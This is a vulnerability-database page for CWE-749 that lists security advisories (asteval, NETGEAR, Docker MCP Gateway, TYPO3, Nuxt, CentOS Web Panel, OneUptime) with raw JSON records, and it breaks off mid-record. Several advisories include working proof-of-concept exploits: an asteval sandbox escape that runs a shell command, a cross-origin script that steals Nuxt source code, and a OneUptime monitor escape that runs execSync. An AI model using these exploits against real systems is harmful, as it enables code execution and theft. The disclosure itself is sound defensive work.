CWE-749
AllowedExposed Dangerous Method or Function
Abstraction: Base · Status: Incomplete
The product provides an Applications Programming Interface (API) or similar interface for interaction with external actors, but the interface includes a dangerous method or function that is not properly restricted.
304 vulnerabilities reference this CWE, most recent first.
GHSA-3WWR-3G9F-9GC7
Vulnerability from github – Published: 2025-01-24 18:45 – Updated: 2025-01-25 00:54Summary
If an attacker can control the input to the asteval library, they can bypass asteval's restrictions and execute arbitrary Python code in the context of the application using the library.
Details
The vulnerability is rooted in how asteval performs handling of FormattedValue AST nodes. In particular, the on_formattedvalue value uses the dangerous format method of the str class, as shown in the vulnerable code snippet below:
def on_formattedvalue(self, node): # ('value', 'conversion', 'format_spec')
"formatting used in f-strings"
val = self.run(node.value)
fstring_converters = {115: str, 114: repr, 97: ascii}
if node.conversion in fstring_converters:
val = fstring_converters[node.conversion](val)
fmt = '{__fstring__}'
if node.format_spec is not None:
fmt = f'{{__fstring__:{self.run(node.format_spec)}}}'
return fmt.format(__fstring__=val)
The code above allows an attacker to manipulate the value of the string used in the dangerous call fmt.format(__fstring__=val). This vulnerability can be exploited to access protected attributes by intentionally triggering an AttributeError exception. The attacker can then catch the exception and use its obj attribute to gain arbitrary access to sensitive or protected object properties.
PoC
The following proof-of-concept (PoC) demonstrates how this vulnerability can be exploited to execute the whoami command on the host machine:
from asteval import Interpreter
aeval = Interpreter()
code = """
# def lender():
# ga
def pwn():
try:
f"{dict.mro()[1]:'\\x7B__fstring__.__getattribute__.s\\x7D'}"
except Exception as ga:
ga = ga.obj
sub = ga(dict.mro()[1],"__subclasses__")()
importer = None
for i in sub:
if "BuiltinImporter" in str(i):
importer = i.load_module
break
os = importer("os")
os.system("whoami")
# pre commit cfb57f0beebe0dc0520a1fbabc35e66060c7ea71, it was required to modify the AST to make this work using the code below
# pwn.body[0].handlers[0].name = lender.body[0].value # need to make it an identifier so node_assign works
pwn()
"""
aeval(code)
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 1.0.5"
},
"package": {
"ecosystem": "PyPI",
"name": "asteval"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.0.6"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-24359"
],
"database_specific": {
"cwe_ids": [
"CWE-134",
"CWE-749"
],
"github_reviewed": true,
"github_reviewed_at": "2025-01-24T18:45:30Z",
"nvd_published_at": "2025-01-24T17:15:16Z",
"severity": "HIGH"
},
"details": "### Summary\nIf an attacker can control the input to the `asteval` library, they can bypass asteval\u0027s restrictions and execute arbitrary Python code in the context of the application using the library.\n\n### Details\nThe vulnerability is rooted in how `asteval` performs handling of `FormattedValue` AST nodes. In particular, the [`on_formattedvalue`](https://github.com/lmfit/asteval/blob/cfb57f0beebe0dc0520a1fbabc35e66060c7ea71/asteval/asteval.py#L507) value uses the [dangerous format method of the str class](https://lucumr.pocoo.org/2016/12/29/careful-with-str-format/), as shown in the vulnerable code snippet below:\n\n```py\n def on_formattedvalue(self, node): # (\u0027value\u0027, \u0027conversion\u0027, \u0027format_spec\u0027)\n \"formatting used in f-strings\"\n val = self.run(node.value)\n fstring_converters = {115: str, 114: repr, 97: ascii}\n if node.conversion in fstring_converters:\n val = fstring_converters[node.conversion](val)\n fmt = \u0027{__fstring__}\u0027\n if node.format_spec is not None:\n fmt = f\u0027{{__fstring__:{self.run(node.format_spec)}}}\u0027\n return fmt.format(__fstring__=val)\n```\n\nThe code above allows an attacker to manipulate the value of the string used in the dangerous call `fmt.format(__fstring__=val)`. This vulnerability can be exploited to access protected attributes by intentionally triggering an `AttributeError` exception. The attacker can then catch the exception and use its `obj` attribute to gain arbitrary access to sensitive or protected object properties.\n\n### PoC\nThe following proof-of-concept (PoC) demonstrates how this vulnerability can be exploited to execute the `whoami` command on the host machine:\n\n```py\nfrom asteval import Interpreter\naeval = Interpreter()\ncode = \"\"\"\n# def lender():\n# ga\n \ndef pwn():\n try:\n f\"{dict.mro()[1]:\u0027\\\\x7B__fstring__.__getattribute__.s\\\\x7D\u0027}\"\n except Exception as ga:\n ga = ga.obj\n sub = ga(dict.mro()[1],\"__subclasses__\")()\n importer = None\n for i in sub:\n if \"BuiltinImporter\" in str(i):\n importer = i.load_module\n break\n os = importer(\"os\")\n os.system(\"whoami\")\n\n# pre commit cfb57f0beebe0dc0520a1fbabc35e66060c7ea71, it was required to modify the AST to make this work using the code below\n# pwn.body[0].handlers[0].name = lender.body[0].value # need to make it an identifier so node_assign works\n \npwn()\n\"\"\"\naeval(code)\n\n```",
"id": "GHSA-3wwr-3g9f-9gc7",
"modified": "2025-01-25T00:54:49Z",
"published": "2025-01-24T18:45:30Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/lmfit/asteval/security/advisories/GHSA-3wwr-3g9f-9gc7"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-24359"
},
{
"type": "WEB",
"url": "https://github.com/lmfit/asteval/commit/45bb47533f7abb5479618ae7f6a809215700dcb2"
},
{
"type": "PACKAGE",
"url": "https://github.com/lmfit/asteval"
},
{
"type": "WEB",
"url": "https://github.com/lmfit/asteval/blob/cfb57f0beebe0dc0520a1fbabc35e66060c7ea71/asteval/asteval.py#L507"
},
{
"type": "WEB",
"url": "https://lucumr.pocoo.org/2016/12/29/careful-with-str-format"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "ASTEVAL Allows Maliciously Crafted Format Strings to Lead to Sandbox Escape"
}
GHSA-3XFC-M583-JQ9V
Vulnerability from github – Published: 2024-05-03 03:30 – Updated: 2024-05-03 03:30NETGEAR ProSAFE Network Management System SettingConfigController Exposed Dangerous Function Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of NETGEAR ProSAFE Network Management System. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed.
The specific flaw exists within the SettingConfigController class. The issue results from an exposed dangerous function. An attacker can leverage this vulnerability to execute code in the context of SYSTEM. Was ZDI-CAN-19725.
{
"affected": [],
"aliases": [
"CVE-2023-38101"
],
"database_specific": {
"cwe_ids": [
"CWE-749"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-05-03T02:15:52Z",
"severity": "HIGH"
},
"details": "NETGEAR ProSAFE Network Management System SettingConfigController Exposed Dangerous Function Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of NETGEAR ProSAFE Network Management System. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed.\n\nThe specific flaw exists within the SettingConfigController class. The issue results from an exposed dangerous function. An attacker can leverage this vulnerability to execute code in the context of SYSTEM. Was ZDI-CAN-19725.",
"id": "GHSA-3xfc-m583-jq9v",
"modified": "2024-05-03T03:30:55Z",
"published": "2024-05-03T03:30:55Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-38101"
},
{
"type": "WEB",
"url": "https://kb.netgear.com/000065707/Security-Advisory-for-Multiple-Vulnerabilities-on-the-ProSAFE-Network-Management-System-PSV-2023-0024-PSV-2023-0025"
},
{
"type": "WEB",
"url": "https://www.zerodayinitiative.com/advisories/ZDI-23-915"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-46GC-MWH4-CC5R
Vulnerability from github – Published: 2025-12-03 16:07 – Updated: 2025-12-03 18:56Impact
When ran in sse or streaming mode (--transport), the Docker MCP Gateway is vulnerable to a DNS rebinding attack.
Vulnerability allows for Browser-Based exploitation of any MCP servers that are executing within the Docker MCP Gateway. Any tools or other features exposed by MCP servers can be manipulated by an attacker who is able to get a victim to visit a malicious website, or if a victim is served a malicious advertisement.
The MCP Gateway is not prone to this attack when started in its default stdio mode, which does not listen on any network ports.
Patches
Patch available in version v0.28.0
Workarounds
Do not start the MCP gateway in sse or streaming mode (use default stdio)
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 0.27.0"
},
"package": {
"ecosystem": "Go",
"name": "github.com/docker/mcp-gateway"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.28.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-64443"
],
"database_specific": {
"cwe_ids": [
"CWE-749"
],
"github_reviewed": true,
"github_reviewed_at": "2025-12-03T16:07:31Z",
"nvd_published_at": "2025-12-03T18:15:46Z",
"severity": "HIGH"
},
"details": "### Impact\nWhen ran in sse or streaming mode (--transport), the Docker MCP Gateway is vulnerable to a DNS rebinding attack. \n\nVulnerability allows for Browser-Based exploitation of any MCP servers that are executing within the Docker MCP Gateway. Any tools or other features exposed by MCP servers can be manipulated by an attacker who is able to get a victim to visit a malicious website, or if a victim is served a malicious advertisement. \n\nThe MCP Gateway is not prone to this attack when started in its default stdio mode, which does not listen on any network ports.\n\n\n### Patches\nPatch available in version v0.28.0\n\n### Workarounds\nDo not start the MCP gateway in sse or streaming mode (use default stdio)",
"id": "GHSA-46gc-mwh4-cc5r",
"modified": "2025-12-03T18:56:54Z",
"published": "2025-12-03T16:07:31Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/docker/mcp-gateway/security/advisories/GHSA-46gc-mwh4-cc5r"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-64443"
},
{
"type": "WEB",
"url": "https://github.com/docker/mcp-gateway/pull/190"
},
{
"type": "WEB",
"url": "https://github.com/docker/mcp-gateway/commit/6b076b2479d8d1345c50c112119c62978d46858e"
},
{
"type": "WEB",
"url": "https://github.com/docker/mcp-gateway/commit/fe073985c8eb6e0c9317d2f198c07686f70ea06d"
},
{
"type": "PACKAGE",
"url": "https://github.com/docker/mcp-gateway"
},
{
"type": "WEB",
"url": "https://modelcontextprotocol.io/specification/2025-06-18/basic/transports#security-warning"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:H/VA:N/SC:H/SI:H/SA:H",
"type": "CVSS_V4"
}
],
"summary": "Docker MCP Plugin and Docker MCP Gateway have DNS Rebinding vulnerability when running in sse or streaming mode"
}
GHSA-47QR-4FFM-5QM9
Vulnerability from github – Published: 2025-04-08 18:34 – Updated: 2025-04-08 18:34Exposed dangerous method or function in Windows Local Session Manager (LSM) allows an authorized attacker to deny service over a network.
{
"affected": [],
"aliases": [
"CVE-2025-26651"
],
"database_specific": {
"cwe_ids": [
"CWE-749"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-04-08T18:15:49Z",
"severity": "MODERATE"
},
"details": "Exposed dangerous method or function in Windows Local Session Manager (LSM) allows an authorized attacker to deny service over a network.",
"id": "GHSA-47qr-4ffm-5qm9",
"modified": "2025-04-08T18:34:46Z",
"published": "2025-04-08T18:34:46Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-26651"
},
{
"type": "WEB",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-26651"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-4G52-PQ8J-6QV5
Vulnerability from github – Published: 2025-01-14 15:40 – Updated: 2025-05-21 14:13Problem
A vulnerability has been identified in the backend user interface functionality involving deep links. Specifically, this functionality is susceptible to Cross-Site Request Forgery (CSRF). Additionally, state-changing actions in downstream components incorrectly accepted submissions via HTTP GET and did not enforce the appropriate HTTP method.
Successful exploitation of this vulnerability requires the victim to have an active session on the backend user interface and to be deceived into interacting with a malicious URL targeting the backend, which can occur under the following conditions:
- the user opens a malicious link, such as one sent via email.
- the user visits a compromised or manipulated website while the following settings are misconfigured:
security.backend.enforceReferrerfeature is disabled,BE/cookieSameSiteconfiguration is set tolaxornone
The vulnerability in the affected downstream component “Extension Manager Module” allows attackers to retrieve and install 3rd party extensions from the TYPO3 Extension Repository - which can lead to remote code execution in the worst case.
Solution
Update to TYPO3 versions 11.5.42 ELTS, 12.4.25 LTS, 13.4.3 LTS that fix the problem described.
Credits
Thanks to TYPO3 core and security members Benjamin Franzke, Oliver Hader, Andreas Kienast, Torben Hansen, Elias Häußler who fixed the issue.
References
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 10.4.47"
},
"package": {
"ecosystem": "Packagist",
"name": "typo3/cms-extensionmanager"
},
"ranges": [
{
"events": [
{
"introduced": "10.0.0"
},
{
"fixed": "10.4.48"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 11.5.41"
},
"package": {
"ecosystem": "Packagist",
"name": "typo3/cms-extensionmanager"
},
"ranges": [
{
"events": [
{
"introduced": "11.0.0"
},
{
"fixed": "11.5.42"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 12.4.24"
},
"package": {
"ecosystem": "Packagist",
"name": "typo3/cms-extensionmanager"
},
"ranges": [
{
"events": [
{
"introduced": "12.0.0"
},
{
"fixed": "12.4.25"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 13.4.2"
},
"package": {
"ecosystem": "Packagist",
"name": "typo3/cms-extensionmanager"
},
"ranges": [
{
"events": [
{
"introduced": "13.0.0"
},
{
"fixed": "13.4.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-55921"
],
"database_specific": {
"cwe_ids": [
"CWE-352",
"CWE-749"
],
"github_reviewed": true,
"github_reviewed_at": "2025-01-14T15:40:07Z",
"nvd_published_at": "2025-01-14T20:15:29Z",
"severity": "HIGH"
},
"details": "### Problem\nA vulnerability has been identified in the backend user interface functionality involving deep links. Specifically, this functionality is susceptible to Cross-Site Request Forgery (CSRF). Additionally, state-changing actions in downstream components incorrectly accepted submissions via HTTP GET and did not enforce the appropriate HTTP method.\n\nSuccessful exploitation of this vulnerability requires the victim to have an active session on the backend user interface and to be deceived into interacting with a malicious URL targeting the backend, which can occur under the following conditions:\n\n* the user opens a malicious link, such as one sent via email.\n* the user visits a compromised or manipulated website while the following settings are misconfigured:\n + `security.backend.enforceReferrer` feature is disabled,\n + `BE/cookieSameSite` configuration is set to `lax` or `none`\n\nThe vulnerability in the affected downstream component \u201cExtension Manager Module\u201d allows attackers to retrieve and install 3rd party extensions from the TYPO3 Extension Repository - which can lead to remote code execution in the worst case.\n\n### Solution\nUpdate to TYPO3 versions 11.5.42 ELTS, 12.4.25 LTS, 13.4.3 LTS that fix the problem described.\n\n### Credits\nThanks to TYPO3 core and security members Benjamin Franzke, Oliver Hader, Andreas Kienast, Torben Hansen, Elias H\u00e4u\u00dfler who fixed the issue.\n\n### References\n* [TYPO3-CORE-SA-2025-006](https://typo3.org/security/advisory/typo3-core-sa-2025-006)",
"id": "GHSA-4g52-pq8j-6qv5",
"modified": "2025-05-21T14:13:28Z",
"published": "2025-01-14T15:40:07Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/TYPO3/typo3/security/advisories/GHSA-4g52-pq8j-6qv5"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-55921"
},
{
"type": "WEB",
"url": "https://github.com/TYPO3-CMS/extensionmanager/commit/a5a58626dcb2af0c31bc6aec068e3d24e789b9e8"
},
{
"type": "PACKAGE",
"url": "https://github.com/TYPO3-CMS/extensionmanager"
},
{
"type": "WEB",
"url": "https://typo3.org/security/advisory/typo3-core-sa-2025-006"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "TYPO3 Extension Manager Module vulnerable to Cross-Site Request Forgery"
}
GHSA-4GF7-FF8X-HQ99
Vulnerability from github – Published: 2025-01-27 11:31 – Updated: 2025-01-30 03:05Summary
Source code may be stolen during dev when using webpack / rspack builder and you open a malicious web site.
Details
Because the request for classic script by a script tag is not subject to same origin policy, an attacker can inject <script src="http://localhost:3000/_nuxt/app.js"> in their site and run the script.
By using Function::toString against the values in window.webpackChunknuxt_app, the attacker can get the source code.
PoC
- Create a nuxt project with webpack / rspack builder.
- Run
npm run dev - Open
http://localhost:3000 - Run the script below in a web site that has a different origin.
- You can see the source code output in the document and the devtools console.
const script = document.createElement('script')
script.src = 'http://localhost:3000/_nuxt/app.js'
script.addEventListener('load', () => {
for (const page in window.webpackChunknuxt_app) {
const moduleList = window.webpackChunknuxt_app[page][1]
console.log(moduleList)
for (const key in moduleList) {
const p = document.createElement('p')
const title = document.createElement('strong')
title.textContent = key
const code = document.createElement('code')
code.textContent = moduleList[key].toString()
p.append(title, ':', document.createElement('br'), code)
document.body.appendChild(p)
}
}
})
document.head.appendChild(script)
It contains the compiled source code and also the source map (but it seems the sourcemap contains transformed content in the
sourcesContent field).
Impact
Users using webpack / rspack builder may get the source code stolen by malicious websites.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "@nuxt/webpack-builder"
},
"ranges": [
{
"events": [
{
"introduced": "3.0.0"
},
{
"fixed": "3.15.3"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "@nuxt/rspack-builder"
},
"ranges": [
{
"events": [
{
"introduced": "3.12.2"
},
{
"fixed": "3.15.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-24361"
],
"database_specific": {
"cwe_ids": [
"CWE-749"
],
"github_reviewed": true,
"github_reviewed_at": "2025-01-27T11:31:41Z",
"nvd_published_at": "2025-01-25T01:15:24Z",
"severity": "MODERATE"
},
"details": "### Summary\nSource code may be stolen during dev when using webpack / rspack builder and you open a malicious web site.\n\n### Details\nBecause the request for classic script by a script tag is not subject to same origin policy, an attacker can inject `\u003cscript src=\"http://localhost:3000/_nuxt/app.js\"\u003e` in their site and run the script.\nBy using `Function::toString` against the values in `window.webpackChunknuxt_app`, the attacker can get the source code.\n\n### PoC\n1. Create a nuxt project with webpack / rspack builder.\n1. Run `npm run dev`\n1. Open `http://localhost:3000`\n1. Run the script below in a web site that has a different origin.\n1. You can see the source code output in the document and the devtools console.\n\n```js\nconst script = document.createElement(\u0027script\u0027)\nscript.src = \u0027http://localhost:3000/_nuxt/app.js\u0027\nscript.addEventListener(\u0027load\u0027, () =\u003e {\n for (const page in window.webpackChunknuxt_app) {\n const moduleList = window.webpackChunknuxt_app[page][1]\n console.log(moduleList)\n\n for (const key in moduleList) {\n const p = document.createElement(\u0027p\u0027)\n const title = document.createElement(\u0027strong\u0027)\n title.textContent = key\n const code = document.createElement(\u0027code\u0027)\n code.textContent = moduleList[key].toString()\n p.append(title, \u0027:\u0027, document.createElement(\u0027br\u0027), code)\n document.body.appendChild(p)\n }\n }\n})\ndocument.head.appendChild(script)\n```\n\n\nIt contains the compiled source code and also the source map (but it seems the sourcemap contains transformed content in the `sourcesContent` field).\n\n### Impact\nUsers using webpack / rspack builder may get the source code stolen by malicious websites.\n",
"id": "GHSA-4gf7-ff8x-hq99",
"modified": "2025-01-30T03:05:05Z",
"published": "2025-01-27T11:31:41Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/nuxt/nuxt/security/advisories/GHSA-4gf7-ff8x-hq99"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-24361"
},
{
"type": "WEB",
"url": "https://github.com/nuxt/nuxt/commit/7eeb910bf4accb1e0193b9178c746f06ad3dd88f"
},
{
"type": "PACKAGE",
"url": "https://github.com/nuxt/nuxt"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "Opening a malicious website while running a Nuxt dev server could allow read-only access to code"
}
GHSA-4HCF-CP54-4WWX
Vulnerability from github – Published: 2022-05-24 17:24 – Updated: 2023-01-24 21:30This vulnerability allows remote attackers to write arbitrary files on affected installations of CentOS Web Panel cwp-e17.0.9.8.923. Authentication is not required to exploit this vulnerability. The specific flaw exists within ajax_mod_security.php. When parsing the archivo parameter, the process does not properly validate a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-9722.
{
"affected": [],
"aliases": [
"CVE-2020-15623"
],
"database_specific": {
"cwe_ids": [
"CWE-749"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2020-07-28T17:15:00Z",
"severity": "HIGH"
},
"details": "This vulnerability allows remote attackers to write arbitrary files on affected installations of CentOS Web Panel cwp-e17.0.9.8.923. Authentication is not required to exploit this vulnerability. The specific flaw exists within ajax_mod_security.php. When parsing the archivo parameter, the process does not properly validate a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-9722.",
"id": "GHSA-4hcf-cp54-4wwx",
"modified": "2023-01-24T21:30:37Z",
"published": "2022-05-24T17:24:32Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-15623"
},
{
"type": "WEB",
"url": "https://www.zerodayinitiative.com/advisories/ZDI-20-770"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-4J36-39GM-8VQ8
Vulnerability from github – Published: 2026-03-07 02:39 – Updated: 2026-03-10 18:44Summary
OneUptime Synthetic Monitors allow low-privileged project users to submit custom Playwright code that is executed on the oneuptime-probe service. In the current implementation, this untrusted code is run inside Node's vm and is given live host Playwright objects such as browser and page.
This creates a distinct server-side RCE primitive: the attacker does not need the classic this.constructor.constructor(...) sandbox escape. Instead, the attacker can directly use the injected Playwright browser object to reach browser.browserType().launch(...) and spawn an arbitrary executable on the probe host/container.
This appears to be a separate issue from the previously published node:vm(GHSA-h343-gg57-2q67) breakout advisory because the root cause here is exposure of a dangerous host capability object to untrusted code, not prototype-chain access to process.
Details
A normal project member can create or edit monitors and monitor tests:
- https://github.com/OneUptime/oneuptime/blob/8e90f451426b160718bdd1796b68c5ec15318101/Common/Models/DatabaseModels/Monitor.ts#L45-L78
- https://github.com/OneUptime/oneuptime/blob/8e90f451426b160718bdd1796b68c5ec15318101/Common/Models/DatabaseModels/MonitorTest.ts#L27-L60
The dashboard exposes a Playwright code editor for Synthetic Monitors and allows the user to queue a test run:
- https://github.com/OneUptime/oneuptime/blob/8e90f451426b160718bdd1796b68c5ec15318101/App/FeatureSet/Dashboard/src/Components/Form/Monitor/MonitorStep.tsx#L861-L918
- https://github.com/OneUptime/oneuptime/blob/8e90f451426b160718bdd1796b68c5ec15318101/App/FeatureSet/Dashboard/src/Components/Form/Monitor/MonitorTest.tsx#L66-L84
The probe worker polls queued monitor tests and executes them:
- https://github.com/OneUptime/oneuptime/blob/8e90f451426b160718bdd1796b68c5ec15318101/Probe/Jobs/Monitor/FetchMonitorTest.ts#L55-L85
For MonitorType.SyntheticMonitor, the user-controlled customCode is passed into SyntheticMonitor.execute(...):
- https://github.com/OneUptime/oneuptime/blob/8e90f451426b160718bdd1796b68c5ec15318101/Probe/Utils/Monitors/Monitor.ts#L323-L338
SyntheticMonitor.execute(...) then runs that code through VMRunner.runCodeInNodeVM(...) and injects the live Playwright browser and page objects into the VM context:
- https://github.com/OneUptime/oneuptime/blob/8e90f451426b160718bdd1796b68c5ec15318101/Probe/Utils/Monitors/MonitorTypes/SyntheticMonitor.ts#L156-L168
VMRunner.runCodeInNodeVM(...) creates a Node vm context and exposes host objects into it, including the additional context objects:
- https://github.com/OneUptime/oneuptime/blob/8e90f451426b160718bdd1796b68c5ec15318101/Common/Server/Utils/VM/VMRunner.ts#L323-L405
The proxy wrapper blocks only a small set of property names and still forwards normal method calls with the real host this binding. Because of that, untrusted monitor code can still use legitimate Playwright methods on the injected browser object.
That is enough for code execution because Playwright's Browser exposes browserType(), and BrowserType.launch() accepts attacker-controlled process launch options such as executablePath, args, and ignoreDefaultArgs. An attacker can therefore cause the probe to spawn an arbitrary executable. Even if Playwright later errors because the spawned process is not a real browser, the command has already executed.
This same execution path is also used for normal scheduled monitors, not only one-shot monitor tests:
- https://github.com/OneUptime/oneuptime/blob/8e90f451426b160718bdd1796b68c5ec15318101/Probe/Jobs/Monitor/FetchList.ts#L110-L121
As a result, the issue can be abused either as a one-shot RCE via Test Monitor or as a persistent scheduled RCE by saving a malicious Synthetic Monitor.
PoC
- Log in as any user with normal project membership.
- Go to
Monitors -> Create New Monitor. - Select
Synthetic Monitor. - In
Playwright Code, paste the following script:
const HostFunction =
Object.getOwnPropertyDescriptor(console, "log").value.constructor;
return {
data: {
node: HostFunction('return process.version')(),
cwd: HostFunction('return process.cwd()')(),
id: HostFunction(
'return process.getBuiltinModule("child_process").execSync("id").toString()'
)(),
},
};
- Select any one browser type, for example
Chromium. - Select any one screen type, for example
Desktop. - Set retry count to
0. - Click
Test Monitorand choose a probe.
Expected result:
- the monitor execution succeeded and in the
Show More Detailsthe command output is shown.
Impact
This is a server-side Remote Code Execution issue affecting the probe component.
Who is impacted:
- any OneUptime deployment where an attacker can obtain ordinary project membership
- environments where the probe has access to internal services, secrets, Kubernetes metadata, database credentials, proxy credentials, or other cluster-local trust relationships
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "@oneuptime/common"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "10.0.20"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-30921"
],
"database_specific": {
"cwe_ids": [
"CWE-749"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-07T02:39:04Z",
"nvd_published_at": "2026-03-10T17:40:16Z",
"severity": "CRITICAL"
},
"details": "Summary\n\nOneUptime Synthetic Monitors allow low-privileged project users to submit custom Playwright code that is executed on the `oneuptime-probe` service. In the current implementation, this untrusted code is run inside Node\u0027s `vm` and is given live host Playwright objects such as `browser` and `page`.\n\nThis creates a distinct server-side RCE primitive: the attacker does not need the classic `this.constructor.constructor(...)` sandbox escape. Instead, the attacker can directly use the injected Playwright `browser` object to reach `browser.browserType().launch(...)` and spawn an arbitrary executable on the probe host/container.\n\nThis appears to be a separate issue from the previously published `node:vm(GHSA-h343-gg57-2q67)` breakout advisory because the root cause here is exposure of a dangerous host capability object to untrusted code, not prototype-chain access to `process`.\n\n## Details\n\nA normal project member can create or edit monitors and monitor tests:\n\n- https://github.com/OneUptime/oneuptime/blob/8e90f451426b160718bdd1796b68c5ec15318101/Common/Models/DatabaseModels/Monitor.ts#L45-L78\n- https://github.com/OneUptime/oneuptime/blob/8e90f451426b160718bdd1796b68c5ec15318101/Common/Models/DatabaseModels/MonitorTest.ts#L27-L60\n\nThe dashboard exposes a Playwright code editor for Synthetic Monitors and allows the user to queue a test run:\n\n- https://github.com/OneUptime/oneuptime/blob/8e90f451426b160718bdd1796b68c5ec15318101/App/FeatureSet/Dashboard/src/Components/Form/Monitor/MonitorStep.tsx#L861-L918\n- https://github.com/OneUptime/oneuptime/blob/8e90f451426b160718bdd1796b68c5ec15318101/App/FeatureSet/Dashboard/src/Components/Form/Monitor/MonitorTest.tsx#L66-L84\n\nThe probe worker polls queued monitor tests and executes them:\n\n- https://github.com/OneUptime/oneuptime/blob/8e90f451426b160718bdd1796b68c5ec15318101/Probe/Jobs/Monitor/FetchMonitorTest.ts#L55-L85\n\nFor `MonitorType.SyntheticMonitor`, the user-controlled `customCode` is passed into `SyntheticMonitor.execute(...)`:\n\n- https://github.com/OneUptime/oneuptime/blob/8e90f451426b160718bdd1796b68c5ec15318101/Probe/Utils/Monitors/Monitor.ts#L323-L338\n\n`SyntheticMonitor.execute(...)` then runs that code through `VMRunner.runCodeInNodeVM(...)` and injects the live Playwright `browser` and `page` objects into the VM context:\n\n- https://github.com/OneUptime/oneuptime/blob/8e90f451426b160718bdd1796b68c5ec15318101/Probe/Utils/Monitors/MonitorTypes/SyntheticMonitor.ts#L156-L168\n\n`VMRunner.runCodeInNodeVM(...)` creates a Node `vm` context and exposes host objects into it, including the additional context objects:\n\n- https://github.com/OneUptime/oneuptime/blob/8e90f451426b160718bdd1796b68c5ec15318101/Common/Server/Utils/VM/VMRunner.ts#L323-L405\n\nThe proxy wrapper blocks only a small set of property names and still forwards normal method calls with the real host `this` binding. Because of that, untrusted monitor code can still use legitimate Playwright methods on the injected `browser` object.\n\nThat is enough for code execution because Playwright\u0027s `Browser` exposes `browserType()`, and `BrowserType.launch()` accepts attacker-controlled process launch options such as `executablePath`, `args`, and `ignoreDefaultArgs`. An attacker can therefore cause the probe to spawn an arbitrary executable. Even if Playwright later errors because the spawned process is not a real browser, the command has already executed.\n\nThis same execution path is also used for normal scheduled monitors, not only one-shot monitor tests:\n\n- https://github.com/OneUptime/oneuptime/blob/8e90f451426b160718bdd1796b68c5ec15318101/Probe/Jobs/Monitor/FetchList.ts#L110-L121\n\nAs a result, the issue can be abused either as a one-shot RCE via `Test Monitor` or as a persistent scheduled RCE by saving a malicious Synthetic Monitor.\n\n### PoC\n\n1. Log in as any user with normal project membership.\n2. Go to `Monitors -\u003e Create New Monitor`.\n3. Select `Synthetic Monitor`.\n4. In `Playwright Code`, paste the following script:\n\n```javascript\n const HostFunction =\n Object.getOwnPropertyDescriptor(console, 